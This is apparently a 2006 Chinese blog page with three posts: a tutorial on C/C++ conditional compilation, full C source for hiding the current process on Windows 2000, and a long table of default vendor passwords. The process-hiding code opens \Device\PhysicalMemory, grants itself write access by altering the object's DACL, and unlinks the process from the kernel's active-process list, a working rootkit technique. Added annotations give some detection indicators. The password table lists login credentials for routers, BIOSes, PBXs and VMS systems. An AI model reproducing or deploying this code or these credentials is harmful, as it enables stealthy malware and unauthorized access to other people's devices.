C++编程中的宏应用
    一般情况下,源程序中所有的行都参加编译。但是有时希望对其中一部分内容只在满足一定条件才进行编译,也就是对一部分内容指定编译的条件,这就是“条件编译”。有时,希望当满足某条件时对一组语句进行编译,而当条件不满足时则编译另一组语句。
    条件编译命令最常见的形式为:
    #ifdef 标识符
    
程序段1
    
#else
    
程序段2
    
#endif
    

    它的作用是:当标识符已经被定义过(一般是用#define命令定义),则对程序段1进行编译,否则编译程序段2。
    其中#else部分也可以没有,即:
    #ifdef
    
程序段1
    
#endif
    

    这里的“程序段”可以是语句组,也可以是命令行。这种条件编译可以提高C源程序的通用性。如果一个C源程序要在不同的计算机系统上运行,而不同的计算机又有一定的差异。例如,我们有一个数据类型,在Windows平台中,应该使用long类型表示,而在其他平台应该使用float表示,这样往往需要对源程序作必要的修改,这就降低了程序的通用性。可以用以下的条件编译:
    #ifdef WINDOWS
    
#define MYTYPE long
    
#else
    
#define MYTYPE float
    
#endif
    

    如果在Windows上编译程序,则可以在程序的开始加上
    #define WINDOWS
    

    这样则编译下面的命令行:
    #define MYTYPE long
    

    如果在这组条件编译命令之前曾出现以下命令行:
    #define WINDOWS 0
    

    则预编译后程序中的MYTYPE都用float代替。这样,源程序可以不必作任何修改就可以用于不同类型的计算机系统。当然以上介绍的只是一种简单的情况,可以根据此思路设计出其它的条件编译。
    例如,在调试程序时,常常希望输出一些所需的信息,而在调试完成后不再输出这些信息。可以在源程序中插入以下的条件编译段:
    #ifdef DEBUG
    
printf("device_open(%p)\n", file);
    
#endif
    

    如果在它的前面有以下命令行:
    #define DEBUG
    

    则在程序运行时输出file指针的值,以便调试分析。调试完成后只需将这个define命令行删除即可。有人可能觉得不用条件编译也可达此目的,即在调试时加一批printf语句,调试后一一将printf语句删除去。的确,这是可以的。但是,当调试时加的printf语句比较多时,修改的工作量是很大的。用条件编译,则不必一一删改printf语句,只需删除前面的一条“#define DEBUG”命令即可,这时所有的用DEBUG作标识符的条件编译段都使其中的printf语句不起作用,即起统一控制的作用,如同一个“开关”一样。
    有时也采用下面的形式:
    #ifndef 标识符
    
程序段1
    
#else
    
程序段2
    
#endif
    

    只是第一行与第一种形式不同:将“ifdef”改为“ifndef”。它的作用是:若标识符未被定义则编译程序段1,否则编译程序段2。这种形式与第一种形式的作用相反。
    以上两种形式用法差不多,根据需要任选一种,视方便而定。
    还有一种形式,就是#if后面的是一个表达式,而不是一个简单的标识符:
    #if 表达式
    
程序段1
    
#else
    
程序段2
    
#endif
    

    它的作用是:当指定的表达式值为真(非零)时就编译程序段1,否则编译程序段2。可以事先给定一定条件,使程序在不同的条件下执行不同的功能。
    例如:输入一行字母字符,根据需要设置条件编译,使之能将字母全改为大写输出,或全改为小写字母输出。
    #define LETTER 1
    
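#include <stdio.h>

/*
 * Demonstrates #if on an expression: prints "C Language" with its
 * letters forced to one case, chosen at compile time by the LETTER
 * macro defined above this listing.
 *   LETTER non-zero -> lowercase letters are converted to uppercase
 *   LETTER zero     -> uppercase letters are converted to lowercase
 * Only one of the two `if` statements is compiled into the program,
 * so the object code carries no runtime test of LETTER.
 *
 * Returns 0 on success.
 */
int main(void)
{
    char str[20] = "C Language";
    char c;
    int i = 0;

    while ((c = str[i]) != '\0') {
        i++;
#if LETTER
        /* ASCII: 'a' - 'A' == 32, so subtracting 32 upper-cases a letter. */
        if (c >= 'a' && c <= 'z') {
            c = c - 32;
        }
#else
        /* Adding 32 lower-cases an ASCII uppercase letter. */
        if (c >= 'A' && c <= 'Z') {
            c = c + 32;
        }
#endif
        printf("%c", c);
    }
    return 0;
}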
    

    运行结果为:C LANGUAGE
    现在先定义LETTER为1,这样在预处理条件编译命令时,由于LETTER为真(非零),则对第一个if语句进行编译,运行时使小写字母变大写。如果将程序第一行改为:
    #define LETTER 0
    

    则在预处理时,对第二个if语句进行编译处理,使大写字母变成小写字母(大写字母与相应的小写字母的ASCII代码差32)。此时运行情况为:
    c language
    有人会问:不用条件编译命令而直接用if语句也能达到要求,用条件编译命令有什么好处呢?的确,此问题完全可以不用条件编译处理,但那样做目标程序长(因为所有语句都编译),而采用条件编译,可以减少被编译的语句,从而减少目标的长度。当条件编译段比较多时,目标程序长度可以大大减少。

发表于 @ 2006年07月11日 12:27 PM | 评论 (0)

Win2000下进程隐藏的一种方案

      十分抱歉,匆匆写了几句代码有点bug,即“ZwOpenSection(&g_hMPM,SECTION_MAP_WRITE|SECTION_MAP_WRITE,&attributes)”使得第一次运行返回失败,请删除原文.

  上次在CVC提到了这东西,因为很简单觉得没必要多说什么,但有人要求写全,所以补充几句:

  很多帖子对此论题作了分析,比如APIHOOK、系统服务HOOK等等,至于远线程注入没有自己的进程,本不算“隐藏”。

  这里写一个2000下的完全隐藏方法,很简单,也没什么新意。

  在讲解之前,首先提一提一些结构,进程执行体块中有数个进程相关链,其中之一是活动进程链。此链的重要
作用之一就是在查询系统信息时供遍历当前活动进程,很有意思的是M$可能因效率因素使它被排除出进程核心块,
意味进线程切换等操作时并不利用它,进一步说改写它也不该有不可忽视的问题(此即本方案的基础)。

  怎么做很明显了,在活动进程双向链中删除想要隐藏的进程即可,核心调试器(如softice/proc)亦查不出来。

  2000下的隐藏当前进程的代码如下:

#include<windows.h>
#include<Accctrl.h>
#include<Aclapi.h>

/*
 * Hand-written declarations of the native (ntdll) types and the two
 * function-pointer types used by the code below. Nothing here comes
 * from an SDK header: InitNTDLL() resolves RtlInitUnicodeString and
 * ZwOpenSection with GetProcAddress at runtime and stores them in the
 * globals at the end of this block.
 *
 * STATUS_INFO_LENGTH_MISMATCH, IO_STATUS_BLOCK and the OBJ_* flags are
 * declared but not referenced by any function in this listing
 * (OpenPhysicalMemory sets Attributes to 0).
 */
#define NT_SUCCESS(Status)      ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH    ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK
{
  NTSTATUS  Status;
  ULONG    Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

/* Counted UTF-16 string as used by the native API; Length is in bytes. */
typedef struct _UNICODE_STRING
{
  USHORT    Length;
  USHORT    MaximumLength;
  PWSTR    Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT       0x00000002L
#define OBJ_PERMANENT      0x00000010L
#define OBJ_EXCLUSIVE      0x00000020L
#define OBJ_CASE_INSENSITIVE  0x00000040L
#define OBJ_OPENIF       0x00000080L
#define OBJ_OPENLINK      0x00000100L
#define OBJ_KERNEL_HANDLE    0x00000200L
#define OBJ_VALID_ATTRIBUTES  0x000003F2L

/* Object-manager open parameters; filled in by OpenPhysicalMemory(). */
typedef struct _OBJECT_ATTRIBUTES
{
  ULONG    Length;
  HANDLE    RootDirectory;
  PUNICODE_STRING ObjectName;
  ULONG    Attributes;
  PVOID    SecurityDescriptor;
  PVOID    SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 

/* Signature of ntdll!ZwOpenSection, resolved at runtime. */
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
            OUT PHANDLE SectionHandle,
            IN ACCESS_MASK DesiredAccess,
            IN POBJECT_ATTRIBUTES ObjectAttributes
            );

/* Signature of ntdll!RtlInitUnicodeString, resolved at runtime. */
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(        
             IN OUT PUNICODE_STRING DestinationString,
             IN PCWSTR SourceString
             );

RTLINITUNICODESTRING    RtlInitUnicodeString;   // set by InitNTDLL(); never NULL-checked
ZWOPENSECTION      ZwOpenSection;               // set by InitNTDLL(); never NULL-checked
HMODULE  g_hNtDLL = NULL;                       // ntdll.dll handle owned by InitNTDLL()/CloseNTDLL()
PVOID   g_pMapPhysicalMemory = NULL;            // view of 0x1000 bytes at physical 0x30000 (OpenPhysicalMemory)
HANDLE   g_hMPM   = NULL;                       // \Device\PhysicalMemory section handle (OpenPhysicalMemory)

/*
 * Loads ntdll.dll and resolves the two native-API entry points this
 * listing uses into the file-scope function pointers declared above.
 *
 * Returns FALSE only when ntdll.dll cannot be loaded. The two
 * GetProcAddress results are stored unchecked, so a NULL pointer would
 * be called later by OpenPhysicalMemory().
 *
 * Defender note: a user-mode program resolving Zw*/Nt* exports
 * dynamically instead of importing them is a recurring loader pattern in
 * this class of tool and is a useful triage signal in import-table and
 * API-monitoring reviews.
 */
BOOL InitNTDLL()
{
  g_hNtDLL = LoadLibrary( "ntdll.dll" );
  if ( !g_hNtDLL )
  {
    return FALSE;
  }

  RtlInitUnicodeString =
    (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
  
  ZwOpenSection =
    (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
  
  return TRUE;
}

/*
 * Releases the ntdll.dll reference taken by InitNTDLL().
 *
 * g_hNtDLL is not reset to NULL and the two function pointers it backs
 * are left set, so calling this twice decrements the module reference
 * count twice and any later use of the pointers relies on ntdll still
 * being mapped (which it always is in a Win32 process).
 */
VOID CloseNTDLL()
{
  if(g_hNtDLL != NULL)
  {
    FreeLibrary(g_hNtDLL);
  }
}

/*
 * Rewrites the DACL of the kernel object behind hSection so that the
 * calling user (the "CURRENT_USER" trustee) is granted SECTION_MAP_WRITE.
 * OpenPhysicalMemory() calls this on \Device\PhysicalMemory after a
 * read/write open was denied; it must pass a handle opened with
 * READ_CONTROL|WRITE_DAC for GetSecurityInfo/SetSecurityInfo to succeed.
 *
 * Errors are not reported to the caller; every failure path just falls
 * through to CleanUp and frees what was allocated.
 *
 * Review: in all three `if(dwRes=call(...)!=ERROR_SUCCESS)` tests the
 * comparison binds tighter than the assignment, so dwRes receives 0/1
 * rather than the Win32 error code. Control flow is unaffected because
 * dwRes is never read afterwards.
 *
 * Defender note: this modifies the object's security descriptor itself,
 * not just the caller's handle, so the weakened DACL presumably remains
 * on the section until reboot and is an auditable artifact (object-access
 * auditing for WRITE_DAC on the object) separate from the hidden process.
 */
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
  
  PACL pDacl=NULL;
  PACL pNewDacl=NULL;
  PSECURITY_DESCRIPTOR pSD=NULL;
  DWORD dwRes;
  EXPLICIT_ACCESS ea;
  
  // Read the current DACL; pSD is the allocation that owns pDacl.
  if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
    NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS)
  {
    goto CleanUp;
  }
  
  // One new allow-ACE: SECTION_MAP_WRITE for the caller's own account.
  ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
  ea.grfAccessPermissions = SECTION_MAP_WRITE;
  ea.grfAccessMode = GRANT_ACCESS;
  ea.grfInheritance= NO_INHERITANCE;
  ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
  ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
  ea.Trustee.ptstrName = "CURRENT_USER";
  
  
  // Merge the ACE into a copy of the existing DACL.
  if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS)
  {
    goto CleanUp;
  }
  
  // Write the merged DACL back onto the section object.
  if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)
  {
    goto CleanUp;
  }
  
CleanUp:
  
  if(pSD)
    LocalFree(pSD);
  if(pNewDacl)
    LocalFree(pNewDacl);
}

/*
 * Opens the \Device\PhysicalMemory section for read+write and maps one
 * 0x1000-byte view of it at physical offset 0x30000.
 *
 * Side effects: sets the globals g_hMPM (section handle) and
 * g_pMapPhysicalMemory (the view). Returns g_hMPM, or NULL on failure.
 *
 * If the first open is denied, the section is reopened with
 * READ_CONTROL|WRITE_DAC, SetPhyscialMemorySectionCanBeWrited() grants
 * the caller SECTION_MAP_WRITE, the handle is closed and the read/write
 * open is retried. The status of the READ_CONTROL|WRITE_DAC open is not
 * checked before g_hMPM is used. If MapViewOfFile fails, g_hMPM is left
 * open when NULL is returned.
 *
 * The author's closing note says 0x30000 is the page-directory physical
 * address "in most cases, but with exceptions"; when it is not, every
 * translation done by LinearToPhys() from this view is wrong.
 *
 * Defender note: a user-mode process opening \Device\PhysicalMemory,
 * especially for write or WRITE_DAC, is a strong indicator on the
 * Windows versions where that is still permitted (user-mode access to
 * this object was removed in later Windows releases).
 */
HANDLE OpenPhysicalMemory()
{
  NTSTATUS    status;
  UNICODE_STRING    physmemString;
  OBJECT_ATTRIBUTES  attributes;
  
  RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );
  
  attributes.Length      = sizeof(OBJECT_ATTRIBUTES);
  attributes.RootDirectory    = NULL;
  attributes.ObjectName      = &physmemString;
  attributes.Attributes      = 0;
  attributes.SecurityDescriptor    = NULL;
  attributes.SecurityQualityOfService  = NULL;
  
  status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
  
  // Denied: grant ourselves write access on the section, then retry.
  if(status == STATUS_ACCESS_DENIED){
    status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
    SetPhyscialMemorySectionCanBeWrited(g_hMPM);
    CloseHandle(g_hMPM);
    status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
  }

  if( !NT_SUCCESS( status ))
  {
    return NULL;
  }
  
  // Access 4 == FILE_MAP_READ (compare FILE_MAP_WRITE in SetData);
  // offset 0x30000 is the assumed page directory (see note above).
  g_pMapPhysicalMemory = MapViewOfFile(
    g_hMPM,
    4,
    0,
    0x30000,
    0x1000);
  if( g_pMapPhysicalMemory == NULL )
  {
    return NULL;
  }
  
  return g_hMPM;
}

/*
 * Translates a virtual address to a physical one by walking a two-level
 * 32-bit page table whose directory is already mapped at BaseAddress.
 * The bit layout matches x86 non-PAE paging: bits 31:22 index the
 * directory, bit 0 is "present", bit 7 marks a 4 MB page, and for 4 KB
 * pages bits 21:12 index the page table that the entry points to.
 *
 * Returns the physical address, or 0 if the directory or table entry is
 * not present. A valid translation of physical 0 is indistinguishable
 * from failure.
 *
 * Review: the MapViewOfFile result for the page table is dereferenced
 * without a NULL check, and on the not-present-PTE path the mapped table
 * view is never unmapped. Pointers are truncated through ULONG, so this
 * is 32-bit only.
 */
PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)
{
  ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;
  PGDE=BaseAddress[VAddr>>22];            // page-directory entry
  if ((PGDE&1)!=0)                        // present?
  {
    ULONG tmp=PGDE&0x00000080;            // bit 7: large (4 MB) page
    if (tmp!=0)
    {
      PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);
    }
    else
    {
      // Map the 4 KB page table this entry points to and read the PTE.
      PGDE=(ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
      PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
      if ((PTE&1)!=0)
      {
        PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
        UnmapViewOfFile((PVOID)PGDE);
      }
      else return 0;                      // view leaked on this path
    }
  }
  else return 0;

  return (PVOID)PAddr;
}

/*
 * Reads one ULONG from virtual address addr by translating it with
 * LinearToPhys() and mapping the containing 4 KB physical page read-only
 * (access 4 == FILE_MAP_READ).
 *
 * Returns the value, or 0 if the page cannot be mapped. A translation
 * failure (LinearToPhys returning 0) is not detected: phys becomes 0 and
 * physical page 0 is read instead. Callers cannot tell 0 from a real 0.
 */
ULONG GetData(PVOID addr)
{
  ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
  PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000);
  if (tmp==0)
    return 0;
  ULONG ret=tmp[(phys & 0xFFF)>>2];        // ULONG index within the page
  UnmapViewOfFile(tmp);
  return ret;
}

/*
 * Writes one ULONG to virtual address addr by translating it with
 * LinearToPhys() and mapping the containing 4 KB physical page for
 * write. Counterpart of GetData().
 *
 * Returns TRUE on success, FALSE if the page cannot be mapped. As in
 * GetData(), a translation failure is not detected and would direct the
 * write at physical page 0.
 */
BOOL SetData(PVOID addr,ULONG data)
{
  ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
  PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
  if (tmp==0)
    return FALSE;
  tmp[(phys & 0xFFF)>>2]=data;             // ULONG index within the page
  UnmapViewOfFile(tmp);
  return TRUE;
}

/*
 * Entry point of the listing: unlinks the calling process from the
 * kernel's active-process list by patching kernel memory through the
 * \Device\PhysicalMemory mapping, so enumerators that walk that list
 * (the system-information query and the debuggers the text names) no
 * longer see it.
 *
 * Every address is hard-coded for the author's Windows 2000 build:
 * 0xFFDFF124 is read as the current thread object, +0x22c on it as the
 * owning process object, and +0xa0/+0xa4 as that process's forward/back
 * list links (the closing text says the offsets differ on NT/XP/2003).
 * The two SetData() calls point the successor's back link (fw+4) at bw
 * and the predecessor's forward link (bw) at fw; the hidden process's
 * own links are left unchanged, which is presumably what the author's
 * note about "small problems after a while" refers to.
 *
 * Error handling: GetData() returns 0 on failure and that 0 is used as
 * the next address without a check; the function returns TRUE even when
 * InitNTDLL() fails; g_hMPM is closed but never cleared.
 *
 * Defender note: only one view of the process is altered, so cross-view
 * enumeration (comparing the list walk with handle-table, scheduler or
 * memory-scan based views) exposes the discrepancy, and the
 * \Device\PhysicalMemory open plus DACL change made above are the host
 * indicators of the technique itself.
 */
BOOL HideProcessAtAll()
{
  if (InitNTDLL())
  {
    if (OpenPhysicalMemory()==0)
    {
      return FALSE;
    }
    ULONG thread=GetData((PVOID)0xFFDFF124);                 // current thread (hard-coded, version-specific)
    ULONG process=GetData(PVOID(thread+0x22c));              // owning process object
    ULONG fw=GetData(PVOID(process+0xa0)),bw=GetData(PVOID(process+0xa4));   // forward/back list links
    SetData(PVOID(fw+4),bw);                                 // successor's back link -> predecessor
    SetData(PVOID(bw),fw);                                   // predecessor's forward link -> successor
    UnmapViewOfFile(g_pMapPhysicalMemory);
    CloseHandle(g_hMPM);
    CloseNTDLL();
  }
  return TRUE;
}

  调用HideProcessAtAll即隐藏当前进程,如若一运行就隐藏,会修改到进程活动链表头,运行一段时间后可能出现些小问题,怎么解决,留作“课后习题”了^_^

  注意默认物理地址0x30000为一页目录,在大多数情况时这样,但是是有例外的!怎么解决亦留作“...”吧,不多废话了。

  稍微改一下偏移可移植于NT/XP/2003。
 
 
 

发表于 @ 2006年04月15日 7:00 PM | 评论 (0)

路由器默认密码

制造商 产品 型号 登录方式 用户名 密码 权限 附注
=======================================================
3COM CellPlex 7000 Telnet tech tech
3COM CoreBuilder 7000/6000/3500/2500 Telnet debug synnet
3COM CoreBuilder 7000/6000/3500/2500 Telnet tech tech
3COM HiPerARC v4.1.x Telnet adm (none)
3COM LANplex 2500 Telnet debug synnet
3COM LANplex 2500 Telnet tech tech
3COM LinkSwitch 2000/2700 Telnet tech tech
3COM NetBuilder SNMP ANYCOM snmp-read
3COM NetBuilder SNMP ILMI snmp-read
3COM Office Connect ISDN Routers 5x0 Telnet n/a PASSWORD Admin
3COM SuperStack II Switch 2200 Telnet debug synnet
3COM SuperStack II Switch 2700 Telnet tech tech
3COM Telnet adm (none)
3COM Telnet admin synnet
3COM Telnet manager manager
3COM Telnet monitor monitor
3COM Telnet read synnet
3COM Telnet security security
3COM Telnet write synnet
3COM AirConnect Access Point 01.50-01 Multi n/a (none) Admin
3com OfficeConnect 812 ADSL Multi adminttd adminttd Admin
3com router Multi n/a (none) Admin
3com hub Multi n/a (none) Admin
3com Wireless AP ANY Multi admin comcomcom Admin Works on all 3com wireless APs
3COM LinkBuilder Telnet n/a (none) Admin
3COM CellPlex 7000 Telnet tech tech User
3com cellplex 7000 Telnet admin admin Admin
3com super stack II Console n/a (none) Admin
Accelerated Networks DSL CPE and DSLAM Telnet sysadm anicust
ADC Kentrox Pacesetter Router Telnet n/a secret
Adtran MX2800 Telnet n/a adtran
Advanced Integration PC BIOS Console n/a Advance Admin
Alcatel PBX 4400 Port 2533 kermit kermit unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 dhs3mt dhs3mt unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 at4400 at4400 unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 mtch mtch unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 mtcl mtcl unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 root letacla unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 dhs3pms dhs3pms unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 adfexc adfexc unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 client client unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 install llatsni unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 halt tlah unknown thanks to Nicolas Gregoire
Allied Telesyn Multi manager friend Admin
allied CJ8MO E-U Telnet (none) (none) Admin
Allied Telesyn Multi secoff secoff Admin
Allied Telesyn Switch AT-8124XL 1.0.3 Multi admin (none) Admin By Nicolas Gregoire
Alteon ACEDirector3 console admin (none)
Alteon ACEswitch 180e HTTP admin admin Admin
Alteon ACEswitch 180e Telnet admin (none)
AMI PC BIOS Console n/a amipswd Admin
AMI PC BIOS Console n/a AMISETUP Admin
AMI PC BIOS Console n/a BIOSPASS Admin
AMI PC BIOS Console n/a HEWITT RAND Admin
AMI PC BIOS Console n/a AM Admin
AMI PC BIOS Console n/a AMI Admin
AMI PC BIOS Console n/a A.M.I Admin
AMI PC BIOS Console n/a AMI_SW Admin
AMI PC BIOS Console n/a AMI?SW Admin
AMI PC BIOS Console n/a aammii Admin
AMI PC BIOS Console n/a AMI!SW Admin
AMI PC BIOS Console n/a AMI.KEY Admin
AMI PC BIOS Console n/a AMI.KEZ Admin
AMI PC BIOS Console n/a AMI~ Admin
AMI PC BIOS Console n/a AMIAMI Admin
AMI PC BIOS Console n/a AMIDECOD Admin
AMI PC BIOS Console n/a AMIPSWD Admin
Amptron PC BIOS Console n/a Polrty Admin
Asante IntraSwitch multi IntraSwitch Asante Admin
Asante IntraStack multi IntraStack Asante Admin
Ascend Yurie Multi readonly lucenttech2
Ascend Router Telnet n/a ascend Admin
Ascend Sahara Multi root ascend
Ascend Yurie Multi readwrite lucenttech1
AST PC BIOS Console n/a SnuFG5 Admin
ast powerexec 4/25sl Multi n/a (none) Admin
AT&T 3B2 Firmware Console n/a mcp Admin
Autodesk Autocad Multi autocad autocad User
Avaya Definity G3Si Multi craft (none) Admin
AVAYA g3R v6 Console root ROOT500 Admin
Avaya Definity G3Si Multi craft (none) Admin
Avaya Cajun Pxxx Multi root root Admin
AWARD PC BIOS Console n/a CONCAT Admin
AWARD PC BIOS Console n/a condo Admin
AWARD PC BIOS Console n/a CONDO Admin
AWARD PC BIOS Console n/a g6PJ Admin
AWARD PC BIOS Console n/a h6BB Admin
AWARD PC BIOS Console n/a HELGA-S Admin
AWARD PC BIOS Console n/a HEWITT RAND Admin
AWARD PC BIOS Console n/a HLT Admin
AWARD PC BIOS Console n/a j09F Admin
AWARD PC BIOS Console n/a j322 Admin
AWARD PC BIOS Console n/a j64 Admin
AWARD PC BIOS Console n/a lkw peter Admin
AWARD PC BIOS Console n/a lkwpeter Admin
AWARD PC BIOS Console n/a PASSWORD Admin
AWARD PC BIOS Console n/a SER Admin
AWARD PC BIOS Console n/a setup Admin
AWARD PC BIOS Console n/a SKY_FOX Admin
AWARD PC BIOS Console n/a SWITCHES_SW Admin
AWARD PC BIOS Console n/a Sxyz Admin
AWARD PC BIOS Console n/a SZYX Admin
AWARD PC BIOS Console n/a t0ch20x Admin
AWARD PC BIOS Console n/a t0ch88 Admin
AWARD PC BIOS Console n/a TTPTHA Admin
AWARD PC BIOS Console n/a TzqF Admin
AWARD PC BIOS Console n/a wodj Admin
AWARD PC BIOS Console n/a zbaaaca Admin
AWARD PC BIOS Console n/a Award Admin
AWARD PC BIOS Console n/a AWARD_SW Admin
AWARD PC BIOS Console n/a lkwpeter Admin
AWARD PC BIOS Console n/a LKWPETER Admin
AWARD PC BIOS Console n/a j262 Admin
AWARD PC BIOS Console n/a j256 Admin
AWARD PC BIOS Console n/a ?award Admin
AWARD PC BIOS Console n/a 01322222 Admin
AWARD v4.51PG v4.51PG Multi n/a SY_MB Admin It is useful and tested
AWARD PC BIOS Console n/a 256256 Admin
AWARD PC BIOS Console n/a admin Admin
AWARD PC BIOS Console n/a alfarome Admin
AWARD PC BIOS Console n/a aLLy Admin
AWARD PC BIOS Console n/a aPAf Admin
AWARD PC BIOS Console n/a award Admin
AWARD PC BIOS Console n/a awkward Admin
AWARD PC BIOS Console n/a BIOS Admin
AWARD PC BIOS Console n/a biosstar Admin
AWARD PC BIOS Console n/a biostar Admin
Axis NETCAM 200/240 Telnet root pass Admin
Bay Networks Switch 350T Telnet n/a NetICs Admin
Bay Networks SuperStack II Telnet security security Admin
Bay Networks Router Telnet User (none) User
Bay Networks Router Telnet Manager (none) Admin
BEA WebLogic https system weblogic Admin allow configuration of X509 certificates (Nicolas Gregoire)
Bintec Bianka Routers Multi admin bintec Admin
Biostar PC BIOS Console n/a Biostar Admin
Biostar PC BIOS Console n/a Q54arwms Admin
boson router simulator 3.66 Multi n/a (none) Admin
boson router simulator 3.66 Multi n/a (none) Admin
Breezecom Breezecom Adapters 3.x n/a Master Admin
Breezecom Breezecom Adapters 4.x n/a Super Admin
Breezecom Breezecom Adapters 2.x n/a laflaf Admin
Brother NC-3100h (none) access network board access
Brother NC-4100h (none) access network board access
Brother HL-1270n Multi n/a access network board access
Cabletron Netgear modem/router and SSR netman (none) Admin
Cabletron routers & switches (none) (none)
Cayman Cayman DSL n/a (none) Admin
Cayman Cayman DSL 3220-H } (none) Admin
Cisco IOS 12.1(3) SNMP n/a cable-docsis SNMP read-write might run on many Ciscos
Cisco IOS 11.x-12.x SNMP n/a ILMI limited READ/WRITE
Cisco CiscoWorks 2000 admin cisco Admin
Cisco CiscoWorks 2000 guest (none) User
CISCO Cache Engine Console admin diamond Admin
Cisco ConfigMaker cmaker cmaker Admin
Cisco IOS Multi cisco cisco
Cisco IOS Multi enable cisco IOS technically has no default pw
cisco cva 122 Telnet admin admin Admin
Cisco IOS 2600 series Multi n/a c but these are common misconfigurations
Cisco CNR All CNR GUI admin changeme Admin This is the default password for Cisco Network Registrar
Cisco IOS Multi n/a cc
Cisco IOS Multi n/a cisco
Cisco IOS Multi n/a Cisco router
Cisco Netranger/secure IDS Multi netrangr attack
Cisco-Arrowpoint Arrowpoint admin system Admin
Compaq PC BIOS Console n/a Compaq Admin
Compaq Insight Manager administrator administrator Admin
Compaq Insight Manager anonymous (none) User
Compaq Insight Manager user user User
Compaq Insight Manager operator operator
Compaq Insight Manager user public User
Compaq Insight Manager PFCUser 240653C9467E45 User
Computer Associates ControlIT ControlIT DEFAULT default Desktop/console access
Concord PC BIOS n/a last Admin
Crystalview OutsideView 32 Crystal Admin
CTX International PC BIOS Console n/a CTX_123 Admin
CyberMax PC BIOS Console n/a Congress Admin
D-Link hubs/switches Telnet D-Link D-Link
D-Link Cable/DSL Routers/Switches Multi (none) admin Admin Model: DI-704/DI-704P
Daewoo PC BIOS Console n/a Daewuu Admin
Dallas Semiconductors TINI embedded JAVA Module <= 1.0 Telnet root tini Admin
Datacom BSASX/101 n/a letmein Admin
Datawizard.net FTPXQ server FTP anonymous any@ read/write on c:\
Daytek PC BIOS Console n/a Daytec Admin
decnet decnet Multi operator admin Guest
Dell Latitude Bios D35B Multi n/a 1RRWTTOOI Admin
Dell CSr500xt Multi n/a admin Admin
dell inspiron Multi n/a admin Admin
Dell PC BIOS Console n/a Dell Admin
Demarc Network Monitor multi admin my_DEMARC Admin
Develcon Orbitor Default Console n/a BRIDGE Admin
Develcon Orbitor Default Console n/a password Admin
Dictaphone ProLog PBX PBX
Dictaphone ProLog NETWORK NETWORK
Dictaphone ProLog NETOP (none)
Digicorp Viper Telnet n/a BRIDGE Admin
Digicorp Viper Telnet n/a password Admin
Digital Equipment VMS Multi DEFAULT USER
Digital Equipment VMS Multi DEFAULT DEFAULT
Digital Equipment VMS Multi DEMO DEMO
Digital Equipment VMS Multi FIELD FIELD
Digital Equipment VMS Multi FIELD SERVICE
Digital Equipment VMS Multi FIELD TEST
Digital Equipment VMS Multi FIELD DIGITAL
Digital Equipment VMS Multi GUEST GUEST
Digital Equipment VMS Multi HELP HELP
Digital Equipment VMS Multi HELPDESK HELPDESK
Digital Equipment VMS Multi HOST HOST
Digital Equipment VMS Multi HOST HOST
Digital Equipment VMS Multi INFO INFO
Digital Equipment VMS Multi INGRES INGRES
Digital Equipment VMS Multi LINK LINK
Digital Equipment VMS Multi MAILER MAILER
Digital Equipment VMS Multi MBMANAGER MBMANAGER
Digital Equipment VMS Multi MBWATCH MBWATCH
Digital Equipment VMS Multi NETCON NETCON
Digital Equipment VMS Multi NETMGR NETMGR
Digital Equipment VMS Multi NETNONPRIV NETNONPRIV
Digital Equipment VMS Multi NETPRIV NETPRIV
Digital Equipment VMS Multi NETSERVER NETSERVER
Digital Equipment VMS Multi NETSERVER NETSERVER
Digital Equipment VMS Multi NETWORK NETWORK
Digital Equipment VMS Multi NEWINGRES NEWINGRES
